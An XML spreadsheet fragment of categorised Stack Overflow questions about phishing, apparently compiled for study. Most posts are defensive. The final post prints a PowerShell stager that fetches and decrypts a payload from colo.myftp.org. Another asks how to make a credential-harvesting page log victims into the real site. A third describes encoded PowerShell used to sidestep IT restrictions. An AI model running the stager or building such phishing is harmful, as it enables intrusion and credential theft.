 I accepted the AJAX answer because it does fix the problem, but I'm still interested in discussion of the design of email validation systems and whether or not anybody else has run into this problem.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;validation&gt;&lt;email&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to prevent others misuse my code for phishing</t>
  </si>
  <si>
    <t>Unauthorised URL redirect</t>
  </si>
  <si>
    <t>@nestjs/swagger: Is it possible to prevent phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm using &lt;a href="https://docs.nestjs.com/openapi/introduction" rel="nofollow noreferrer"&gt;@nestjs/swagger&lt;/a&gt; in the Nest.js application to generate Swagger documentation.&lt;/p&gt;
 &lt;p&gt;In the documentation we have a simple example like&lt;/p&gt;
 &lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt; const config = new DocumentBuilder()
  .setTitle('Cats example')
  .setDescription('The cats API description')
  .setVersion('1.0')
  .addTag('cats')
  .build();
  const document = SwaggerModule.createDocument(app, config);
  SwaggerModule.setup('api', app, document);
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;With this implementation, I faced the security issue, which can expose attackers to phishing. For example, we have a swagger page&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;https://petstore.swagger.io/
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Attackers can add a query parameter in URL like&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;https://petstore.swagger.io/?url=https://27.rs/card.yaml#/default/get_
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;That can lead to security issues. Is there any way to prevent it? Can we disable the query parameters for the Swagger URL, or clean it? To convert&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://petstore.swagger.io/?url=https://27.rs/card.yaml#/default/get" rel="nofollow noreferrer"&gt;https://petstore.swagger.io/?url=https://27.rs/card.yaml#/default/get&lt;/a&gt;_ =&amp;gt; &lt;a href="https://petstore.swagger.io/" rel="nofollow noreferrer"&gt;https://petstore.swagger.io/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;As a 4-th parameter &lt;code&gt;SwaaggerModule.setup&lt;/code&gt; function can receive options. I have tried to do something with them but still no result. Here are possible parameters&lt;/p&gt;
 &lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;export interface SwaggerCustomOptions {
  explorer?: boolean;
  swaggerOptions?: Record&amp;lt;string, any&amp;gt;;
  customCss?: string;
  customCssUrl?: string;
  customJs?: string;
  customfavIcon?: string;
  swaggerUrl?: string;
  customSiteTitle?: string;
  validatorUrl?: string;
  url?: string;
  urls?: Record&amp;lt;'url' | 'name', string&amp;gt;[];
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I can see also the open issue in &lt;a href="https://github.com/swagger-api/swagger-ui/issues/4332" rel="nofollow noreferrer"&gt;GitHub&lt;/a&gt; regarding this question.
 There are mentioned about the usage of &lt;code&gt;window.history.replaceState(null, &amp;quot;&amp;quot;, window.location.pathname);&lt;/code&gt;. How it can be used in @nestjs/swagger?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;node.js&gt;&lt;swagger&gt;&lt;nestjs&gt;&lt;swagger-ui&gt;&lt;nestjs-swagger&gt;</t>
  </si>
  <si>
    <t>Replicating Certutil.exe's -decodehex output exactly</t>
  </si>
  <si>
    <t>&lt;p&gt;I have done a ton more research since I first posted this question and I think I had a few terms goofed up as well.&lt;/p&gt;
 &lt;p&gt;Dilemma: My company's Information Security team has flagged &lt;code&gt;certutil.exe&lt;/code&gt; as a potentially dangerous application to be used after a recent phishing attack. This really stinks because we LOVE &lt;code&gt;certutil.exe&lt;/code&gt; for the lightning fast and dead-nuts accurate conversion of hex files into ascii files. These ascii files have to be converted exactly as &lt;code&gt;certutil.exe -decodehex&lt;/code&gt; performs in order to be parsed by another program to read and interpret various pieces of data produced by a separate in-house program.&lt;/p&gt;
 &lt;p&gt;I have a &lt;code&gt;PowerShell&lt;/code&gt; script which seems to convert &lt;code&gt;Hex&lt;/code&gt; to &lt;code&gt;ASCII&lt;/code&gt; very accurately, BUT, it never seems to &amp;quot;finish&amp;quot; as though maybe the while loop is dorked up. Additionally, because of how the stream is is broken down, there are far too many line-breaks in the resulting file. The files are typically 7 MB a piece, roughly 7-8 &lt;em&gt;billion&lt;/em&gt; characters long, and roughly 11 line breaks.&lt;/p&gt;
 &lt;p&gt;The script I mention is below and is an adaptation of the work presented &lt;a href="https://www.itprotoday.com/powershell/get-hex-dumps-files-powershell" rel="nofollow noreferrer"&gt;in this link&lt;/a&gt;. Instead of converting the data stream into a &lt;code&gt;Hex&lt;/code&gt; representation of the &lt;code&gt;Hex&lt;/code&gt; data, I convert it to &lt;code&gt;ASCII&lt;/code&gt;.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$bufferSize = 65536
 $ASCIIFile = &amp;quot;C:\FooBar.dat&amp;quot;
 $stream = [System.IO.File]::OpenRead(
  &amp;quot;C:\FixedOutput.dat&amp;quot;)
 while ( $stream.Position -lt $stream.Length ) {
 #BEGIN CALLOUT A
  $buffer = new-object Byte[] $bufferSize
  $bytesRead = $stream.Read($buffer, 0, $bufferSize)
 #END CALLOUT A
  for ( $line = 0; $line -lt [Math]::Floor($bytesRead /
  16); $line++ ) {
 $slice = $buffer[($line * 16)..(($line * 16) + 15)]
 $bytes=[System.Text.Encoding]::ASCII.GetString($slice)
 $asc = -join($bytes-split&amp;quot;(..)&amp;quot;|?{$_}|%{[char][convert]::ToByte($_,16)})
 $asc | Write-Host &amp;gt;&amp;gt; $ASCIIFile -NoNewline
  }
 #BEGIN CALLOUT B
  if ( $bytesRead % 16 -ne 0 ) {
  $slice = $buffer[($line * 16)..($bytesRead - 1)]
  $output = &amp;quot;&amp;quot;
  foreach ( $byte in $slice ) {
  $output=[System.Text.Encoding]::ASCII.GetString($byte)
  }
  $output | ADD-Content $Asciifile
 #END CALLOUT B
  }
 }
 $stream.Close()
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Additionally, I had adapted the &lt;code&gt;PowerShell&lt;/code&gt; code from &lt;a href="https://stackoverflow.com/questions/41762760/convert-hex-to-ascii-in-powershell"&gt;this S.O. article&lt;/a&gt; in addition to the presumably previous duplicate question and answer. The problem with this set of code, is the output still took 15 minutes or so, but the output is not identical to &lt;code&gt;certutil.exe -decodehex&lt;/code&gt; so the information cannot be parsed by our in-house program!&lt;/p&gt;
 &lt;p&gt;Additionally, I can literally copy and paste the hex data from the original file, paste it into a hex editor and then save the output as a new file to get what I need.&lt;/p&gt;
 &lt;p&gt;Problem is, we often have 30 - 40 of these files at once and we need a lightning fast solution. . .&lt;/p&gt;
 &lt;p&gt;I've looked for &lt;code&gt;VB.net&lt;/code&gt; (my 2nd most familiar language) solutions, but they are comparable in methods as the &lt;code&gt;PowerShell&lt;/code&gt; methods I have found, and nothing adequately takes an entire file and puts it to &lt;code&gt;ASCII&lt;/code&gt; with relative ease or Accuracy.&lt;/p&gt;
 &lt;h2&gt;UPDATE:&lt;/h2&gt;
 &lt;p&gt;In addition to re-formatting the question, I have also put to test the very well-detailed answer below from TheMadTechnician and this brought magnificently glorious tears to my eyes. If I could reach through the silicon and kiss you, I probably would. &lt;strong&gt;TEXTBOOK MATCH. LIGHTNING FAST. BEAUTIFUL.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;Now. . . . let us hope my I.S. Dept. doesn't flag this methodology as well and make noise about it. . .&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;I modified the &lt;code&gt;-join&lt;/code&gt; statement since I'm concatenating the files prior to calling &lt;code&gt;PowerShell&lt;/code&gt; from within a &lt;code&gt;Batch&lt;/code&gt; script, but this would work beautifully within &lt;code&gt;PowerShell&lt;/code&gt; as well.&lt;/p&gt;
 &lt;p&gt;Lastly, since our I.S. Dept. restricts the usage of &lt;code&gt;.ps1&lt;/code&gt; scripts, a while back, I found an awesome option to embed complex commands as Base64 strings instead and then calling this using &lt;code&gt;Start /MIN powershell -encodedcommand _insertEncodedCommandHere_&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;Again - I cannot thank you enough! If I ever get a working method utilizing this same &lt;code&gt;crypt32.dll&lt;/code&gt; library via VB.Net, I'll come back and post it as an answer as well, but YOU have won the prize!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;vb.net&gt;&lt;powershell&gt;&lt;batch-file&gt;&lt;certutil&gt;</t>
  </si>
  <si>
    <t>Is it phishing? Human/Manual detection and reporting, This was block by my filter, is it phishing?</t>
  </si>
  <si>
    <t>Reporting websites from legitimate host</t>
  </si>
  <si>
    <t>Report a phishing site hosted in</t>
  </si>
  <si>
    <t>&lt;p&gt;Phishing Site&lt;/p&gt;
 &lt;p&gt;Does someone know how can I report a phishing site hosted in Heroku? I'm trying to find a number or email to let us know if they can down the page&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;heroku&gt;&lt;server&gt;&lt;spoofing&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Emails from legitimate host</t>
  </si>
  <si>
    <t>nobody@mycraftmail.com - Anyone came through this email Address?</t>
  </si>
  <si>
    <t>&lt;p&gt;In my site nobody@mycraftmail.com email coming suspiciously.&lt;/p&gt;
 &lt;p&gt;Don't know how above email gets coming. But, when I cross-checked those request. Those are from Amazon AWS IP(54.71.187.124). On googled further, found that email is in phishing database.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://raw.githubusercontent.com/mitchellkrogza/Phishing.Database/master/phishing-links-ACTIVE.txt" rel="nofollow noreferrer"&gt;https://raw.githubusercontent.com/mitchellkrogza/Phishing.Database/master/phishing-links-ACTIVE.txt&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Did anyone have an idea about it?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;amazon-web-services&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Many signs</t>
  </si>
  <si>
    <t>Email about IPN certificate upgrade: Is it legit?</t>
  </si>
  <si>
    <t>&lt;p&gt;A few days ago, I received the following email from address paypal@paypal.com and with subject "IMMEDIATE ATTENTION REQUIRED: PayPal service upgrades.".&lt;/p&gt;
 &lt;p&gt;I have reason to believe it is a phishing attempt. Please find my notes in the end and try to justify why I'm right or wrong.&lt;/p&gt;
 &lt;p&gt;The only part of the mail that I removed was my name in the third line.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;PayPal service upgrades.&lt;/p&gt;
  &lt;p&gt;,&lt;/p&gt;
  &lt;p&gt;As we have previously communicated to you, PayPal is upgrading the&lt;/p&gt;
  &lt;p&gt;certificate for www.paypal.com to SHA-256. This endpoint is also used
  by merchants using the Instant Payment Notification (IPN) product. &lt;/p&gt;
  &lt;p&gt;This upgrade is scheduled for 9/30/2015; however, we may need to
  change this date on short notice to you to align to the industry
  security standard.&lt;/p&gt;
  &lt;p&gt;You‚Äôre receiving this notification because you‚Äôve been identified as a
  merchant who has used IPN endpoints within the past year. If you have
  not made the necessary changes, we urge you to do so right away to
  avoid a disruption of your service!&lt;/p&gt;
  &lt;p&gt;Because these changes are technical in nature, we advise that you
  consult with your individuals responsible for your PayPal integration.
  They will be able to identify what, if any, changes are needed. Please
  share this email and the hyperlinks below with your technical contact
  for evaluation.&lt;/p&gt;
  &lt;p&gt;Testing in the Sandbox is one of the best ways to make sure your
  integration works. Sandbox endpoints have been upgraded to accept
  secure connections by the SHA-256 Certificates.&lt;/p&gt;
  &lt;p&gt;Full technical details can be found in our &lt;a href="https://www.paypal-knowledge.com/resources/sites/PAYPAL/content/live/FAQ/1000/FAQ1766/en_US/2015%20Merchant%20Security%20System%20Upgrade%20Guide%20%28U.S.%20English%29.pdf" rel="nofollow"&gt;Merchant Security System
  Upgrade Guide&lt;/a&gt;. In addition, our &lt;a href="https://www.paypal-knowledge.com/infocenter/index?page=content&amp;amp;id=FAQ1766&amp;amp;expand=true&amp;amp;locale=en_US" rel="nofollow"&gt;2015-2016 SSL Certificate Change
  microsite&lt;/a&gt; contains a schedule of our service upgrade plan.&lt;/p&gt;
  &lt;p&gt;Thanks for your patience as we continue to improve our services.&lt;/p&gt;
  &lt;p&gt;Please do not reply to this email. We are unable to respond to
  inquiries sent to this address. For immediate answers to your
  questions, visit our Help Center by clicking "Help" on any PayPal
  page. Copyright ¬© 2014 PayPal. All rights reserved. PayPal (Europe)
  S.√° r.l. et Cie, S.C.A., Soci√©t√© en Commandite par Actions. Registered
  office: 22-24 Boulevard Royal, L-2449, Luxembourg, R.C.S. Luxembourg B
  118 349.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Here's why I think it's fake:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;They just address the customer by name, no "Dear" etc.&lt;/li&gt;
 &lt;li&gt;Copyright 2014? strange...&lt;/li&gt;
 &lt;li&gt;The phrase "we may need to change this date on short notice to you to align to the industry security standard" has a minor mistake (IMO, although I'm not a native English speaker) and doesn't sound like a company's policy. Talking about &lt;em&gt;maybe&lt;/em&gt; changing a date is not professional.&lt;/li&gt;
 &lt;li&gt;The subject... come on, caps?&lt;/li&gt;
 &lt;li&gt;The links are to a strange domain, the certificate of which is issued by a different company than paypal.com's. One serves a pdf.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I think it's a pretty elaborate phishing attempt, but it strikes me that in online discussions about it (dating back many months), representatives of various companies treat it as legit.&lt;/p&gt;
 &lt;p&gt;So, am I missing something?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;paypal&gt;&lt;paypal-ipn&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Is it phishing? Human/Manual detection and reporting. </t>
  </si>
  <si>
    <t>Reporting abandoned hacked domains</t>
  </si>
  <si>
    <t>Possible Wordpress exploitation</t>
  </si>
  <si>
    <t>&lt;p&gt;Does anybody know of a security vulnerability in Wordpress whereby fraudsters are sending out banking phishing emails (purporting to be banks) with a login link pointing to a valid domain but with extended path that may be unknown to the legitimate owner of the domain?&lt;/p&gt;
 &lt;p&gt;For Example:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;href = [HOST]=http://www.ponnuki.net
  [EXTENSION] = /wordpress/MOBILE-DO/absa-mobiledo/absaBanking/index.php
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Judging from the number of these I have been receiving recently, it appears that the hosts are not geo-specific, so the obvious conclusion is that they are seeking out vulnerable hosts to piggy-back on.&lt;/p&gt;
 &lt;p&gt;Can someone recommend who would be the best to report this to?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wordpress&gt;&lt;security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Automatically reporting phishing</t>
  </si>
  <si>
    <t>May I know how to report phishing with Gmail API?</t>
  </si>
  <si>
    <t>&lt;p&gt;It is easy to report phishing in Gmail UI, but I want to report a phishing attack with Gmail API. May I know how to do it and what the api endpoint is?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;gmail&gt;&lt;report&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is there security issues with best practices, commonly used security practices.</t>
  </si>
  <si>
    <t>Prevent impersonating Oauth</t>
  </si>
  <si>
    <t>Doesn't OAuth 2.0 PKCE Flow open the door to masquerading/phishing attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;With OAuth 2.0 PKCE Flow for Installed App (e.g. a desktop app/cli/client library), it seems that nothing is preventing an attacker to:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;obtain &lt;code&gt;client_id&lt;/code&gt; by using the original app (client_id is public and can be easily copied from browser bar/source code)&lt;/li&gt;
 &lt;li&gt;make a fake app to mimic original app&lt;/li&gt;
 &lt;li&gt;use the fake app to seduce the user to grant access and thus obtain a refresh token which essentially means full access within requested scopes&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Without PKCE, it's hard to fake an app and obtain a refresh token because that would require an attacker to obtain &lt;code&gt;client_secret&lt;/code&gt;. It seems to me that, although PKCE offers security improvements over implicit flow, it makes it so much easier to masquerade authentic apps that use OAuth 2.0?&lt;/p&gt;
 &lt;p&gt;I'm using googlecloudsdk (gcloud), it seems that it has &lt;a href="https://github.com/twistedpair/google-cloud-sdk/blob/master/google-cloud-sdk/lib/googlecloudsdk/core/config.py#L166" rel="noreferrer"&gt;client_id&lt;/a&gt; (and even many &lt;a href="https://github.com/twistedpair/google-cloud-sdk/blob/master/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/bigquery/v2/bigquery_v2_client.py#L21" rel="noreferrer"&gt;client_id/client_secret pairs&lt;/a&gt;) hard coded into the source code, which is distributed to the client. I doubt there's anything to stop attackers to fake gcloud and thus gain access to user's GCP environment (for proof, run &lt;code&gt;gcloud auth login&lt;/code&gt; and it will show you the url in the console that an attacker needs.) Could anyone clarify/help me to understand what's going on?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;oauth-2.0&gt;&lt;gcloud&gt;&lt;google-cloud-sdk&gt;&lt;phishing&gt;&lt;pkce&gt;</t>
  </si>
  <si>
    <t>General question for defences against phishing</t>
  </si>
  <si>
    <t>how to implement anti phishing mechanisn for a web application</t>
  </si>
  <si>
    <t>&lt;p&gt;we have internal portal which we will use for configuration. How to implement anti phishing mechanism 
 1.which mechanism to use&lt;br&gt;
 2.how to use&lt;br&gt;
 thanks in advance&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>SSL warnings</t>
  </si>
  <si>
    <t>Why do browsers show ugly errors for untrusted SSL certificates?</t>
  </si>
  <si>
    <t>&lt;p&gt;When faced by an untrusted certificate, every single browser I know displays a blaring error like this:&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/6RwXk.png"&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Why&lt;/strong&gt; is that? &lt;/p&gt;
 &lt;p&gt;This strongly discourages web developers to use an awesome technology like SSL out of fears that users will find the website extremely shady. Ilegitimate (ie: phishing) sites do fine on HTTP, so that can't be a concern. &lt;/p&gt;
 &lt;p&gt;Why do they make it look like such a big deal? Isn't having SSL even if untrusted better than not having it at all?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;It looks like I am being misunderstood. I am taking issue with the fact that HTTP sites cannot be more secure than an HTTPS site, even if untrusted. HTTP doesn't do encryption or identification. Phishers can make their sites on HTTP and no warnings are shown. In good faith, I am at the very least encrypting traffic. How can that be a bad thing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;browser&gt;&lt;ssl&gt;</t>
  </si>
  <si>
    <t>What is the best way to stop phishing for online banking?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Phishing" rel="noreferrer"&gt;Phishing&lt;/a&gt; is a very serious problem that we face. However, banks are the biggest targets. What methods can a bank use to protect its self from phishing attacks? What methods should someone use to protect themselves. Why does it stop attacks? &lt;/p&gt;</t>
  </si>
  <si>
    <t>Free phishing email dataset examples</t>
  </si>
  <si>
    <t>&lt;p&gt;I am searching for phishing email datasets and could find only a couple of them till now. The are the Enron, SpamAssassin, TREC 2007, UCI dataset, Nigerian Fraud Emails, Hilary Clinton Email Dataset, Nazario and Lingspam. These are however seem to be old examples.&lt;/p&gt;
 &lt;p&gt;Do you know any current datasets that one can download and use for NLP?&lt;/p&gt;
 &lt;p&gt;Thanks in advance&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;nlp&gt;&lt;dataset&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Cannot deal with the dataset format</t>
  </si>
  <si>
    <t>Splitting Emails with MIME::Parser</t>
  </si>
  <si>
    <t>&lt;p&gt;I got handed 4GB of emails concatenated into a single file and the suggestion that MIME::Parser could split the individual emails back out again. All my attempts to date end up with the parser just copying the original file without extracting any of the emails. So: Is this even something that MIME::Parser can handle? My code is very basic:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;my $file = IO::File-&amp;gt;new("somefile", O_RDONLY);
 my $parser = new MIME::Parser;
 $parser-&amp;gt;output_dir("somedir");
 my $entity = $parser-&amp;gt;parse($file);
 $file-&amp;gt;close;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Below is a link to sample date that some have requested. &lt;strong&gt;This is all SPAM and phishing emails. DO NOT CLICK ANY OF THE LINKS.&lt;/strong&gt; Enjoy: &lt;a href="http://pastebin.com/pqNcfP4N" rel="nofollow"&gt;Pastbin of 4KB of emails.&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;perl&gt;&lt;email&gt;&lt;mime&gt;</t>
  </si>
  <si>
    <t>Programing issues while dealing with the dataset</t>
  </si>
  <si>
    <t>Scraping XML w/ BeautifulSoup4 in Python</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to scrape the contents of a setlist (for example, Phish setlists - &lt;a href="http://api.setlist.fm/rest/0.1/search/setlists?artistName=phish" rel="nofollow noreferrer"&gt;http://api.setlist.fm/rest/0.1/search/setlists?artistName=phish&lt;/a&gt;). However, I'm having trouble getting BeautifulSoup to pull the song titles out of the attribute.&lt;/p&gt;
 &lt;p&gt;Effectively, I want to only look at the first tag, and pull the name of the song from the attribute. For example, &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;song name="Down With Disease&amp;gt; some other crap and tags in here &amp;lt;/song&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Whereas I want to pull all of the 'name' information, and nothing else within the tags.&lt;/p&gt;
 &lt;p&gt;If anybody can point me in the direction of the appropriate method to use, that'd be great. I'm having trouble finding it within the documentation of BS. I'd like to effectively geneerate a list containing all of the attribute values for the first setlist tag in my XML document.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;xml&gt;&lt;parsing&gt;&lt;beautifulsoup&gt;</t>
  </si>
  <si>
    <t>Phishtank URL search from database</t>
  </si>
  <si>
    <t>&lt;p&gt;I am concerned about performance issues for following code&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; $phishtank = @unserialize(file_get_contents('verified_online.php_serialized'));
  $found = false;
  if(is_array($phishtank)) {
  foreach($phishtank as $phishing) {
  if($phishing['url'] == 'http://88.204.202.98/login.php') {
  $found = true;
  break;
  }
  }
  }
  if($found) {
  echo 'URL found';
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;There are 98% chances that all URLs are clean. 3 URLs take approx 6-9 sec (without profiling, random searching) in searching and due to nature of our handling we can't search all urls at once. Is there any better way to search multi URLs without going through loop every time?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Code errors</t>
  </si>
  <si>
    <t>binary classifying model in pytorch using cnn</t>
  </si>
  <si>
    <t>&lt;p&gt;i build a classifying model about phishing site.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;1. first, about my data&lt;/strong&gt;&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;num_dataset: i have about 16000 dataset&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;blockquote&gt;
 &lt;p&gt;num_feature: my dataset has 12 characterisitics.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;blockquote&gt;
 &lt;p&gt;label: if it's a phishing site, i set it's label -1. else 1&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;blockquote&gt;
 &lt;p&gt;batch_size: set batch_size 128, for cnn model&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;blockquote&gt;
 &lt;p&gt;kernel_size: 3&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;strong&gt;2. I try&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;from torch.utils.data import DataLoader, TensorDataset
 train_dataset = TensorDataset(x_train, y_train)
 train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
 #-------------------------------------------------------#
 class CNN(nn.Module):
  def __init__(self, kernel_size):
  super().__init__() 
  self.layer1 = nn.Sequential(
  nn.Conv1d(12, 32, 3,
  stride=1, padding=1)
 ...
  def forward(self, x):
  out = self.layer1(x)
 ...
 #-------------------------------------------------------#
 model = CNN()
 for epoch in range(epochs):
  avg_cost = 0
  for x_train, y_train in train_loader:
  Hypothesis = model(x_train)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;x_train.shape&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;torch.Size([16072, 12])&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;y_train.shape&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;torch.Size([16072, 1])&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;strong&gt;3. Error&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;at &lt;code&gt;Hypothesis = model(x_train)&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;RuntimeError: Expected 3-dimensional input for 3-dimensional weight [32, 12, 3], but got 2-dimensional input of size [128, 12] instead&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;4. Finnally&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;i think it's because I'm confused between conv1d and conv2d but i can't figure it out...&lt;/p&gt;
 &lt;p&gt;plz, i want to know the cause of this problem&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python-3.x&gt;&lt;pytorch&gt;&lt;conv-neural-network&gt;&lt;convolution&gt;</t>
  </si>
  <si>
    <t>Planning a spoofing or phishing</t>
  </si>
  <si>
    <t>Making the attack more advance</t>
  </si>
  <si>
    <t>using php and curl for phishing demo</t>
  </si>
  <si>
    <t>&lt;p&gt;I have created a phishing site (for demonstration) that is identical to the login of the site that I am trying to copy. When you submit your username and password, it uses php to save them in a mysql database. Right now, it just redirects you to an error page (that I created) after it saves the info. I was thinking, to make this site more advanced, I could use the login data I saved and redirect people to the real site ALREADY LOGGED IN so its as if my site was the real one and nobody would know. I did some researching and found cURL but Im still not entirely sure how to use it in my case. I want to redirect people to the real site and log them in with the info they typed in on my phishing site. Thanks in advance!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;mysql&gt;&lt;curl&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Technical invistigating and tracing of phishing</t>
  </si>
  <si>
    <t>Exploring the URL cloacking</t>
  </si>
  <si>
    <t>Phishing attack - how does this specific one works?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have received a phishing email recently.
 In chrome, when I right click on the link and click copy link address. this is the URL that is copied to the clipboard:
 &lt;a href="http://googledrive.com/host/0B4RDWFvJBbLZbWgyTmRwWDUwbzA" rel="nofollow"&gt;http://googledrive.com/host/0B4RDWFvJBbLZbWgyTmRwWDUwbzA&lt;/a&gt; (WARNING: PHISINHG SITE!)&lt;/p&gt;
 &lt;p&gt;I'm trying to understand how this exactly works:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;In chrome, when I paste this url and go the the site, I'm redirected to the phishing site.&lt;/li&gt;
 &lt;li&gt;In chrome, when I paste the same URL in incognito mode I'm redirected to &lt;a href="https://accounts.google.com" rel="nofollow"&gt;https://accounts.google.com&lt;/a&gt; with a valid certificate by google. (???)&lt;/li&gt;
 &lt;li&gt;In chrome when I paste and go to &lt;a href="http://googledrive.com" rel="nofollow"&gt;http://googledrive.com&lt;/a&gt;, I'm redirected to my google drive with valid certificate from google.&lt;/li&gt;
 &lt;li&gt;In IE when I paste and go the the original URL (the one that redirects to the phishing site in chrome) I am redirected to &lt;a href="https://accounts.google.com" rel="nofollow"&gt;https://accounts.google.com&lt;/a&gt; with certificate from google.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;That does not make any sense to me.
 If the domain googledrive.com belongs to google. then how the redirection to the phishing site happens? Why does in happen only in chrome and why does it happen only when not in incognito mode?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;redirect&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Asking for advice on the analysis</t>
  </si>
  <si>
    <t>phishing power shell script found</t>
  </si>
  <si>
    <t>&lt;p&gt;Some please help me to analyse this code.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;[SYstem.NEt.SeRVICEPoiNtMAnagEr]::EXPecT100CONtinue=0;$wC=NEW-ObJECt SYsteM.NEt.WebCLiENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
 $wC.HEADerS.Add('User-Agent',$u);
 $wC.PROxY=[SYstem.NEt.WeBReqUest]::DeFaULtWeBPrOxy;
 $Wc.PRoXy.CRedEntiALS = [SYSTEM.NET.CReDENTiAlCaCHe]::DEFAULTNETwORkCREdENTIalS;
 $Script:Proxy = $wc.Proxy;$K=[SYstem.TeXT.ENcodiNg]::ASCII.GetBYTEs('3c9825ffc1d70f40ec648606c637200d'); $R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]}; $D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}}; $ser='http://colo.myftp.org:4445';$t='/admin/get.php';$wC.HEadeRs.ADD("Cookie","session=R9rR6fhOaMdGNJI1saLgl2JtVSY="); $daTA=$WC.DOWnlOADDATa($SER+$T); $IV=$DATa[0..3];$DaTA=$dATa[4..$dATa.lENGTH];
 -JOiN[ChAR[]](&amp;amp; $R $dAta ($IV+$K)) write-host $R
 &lt;/code&gt;&lt;/pre&gt;
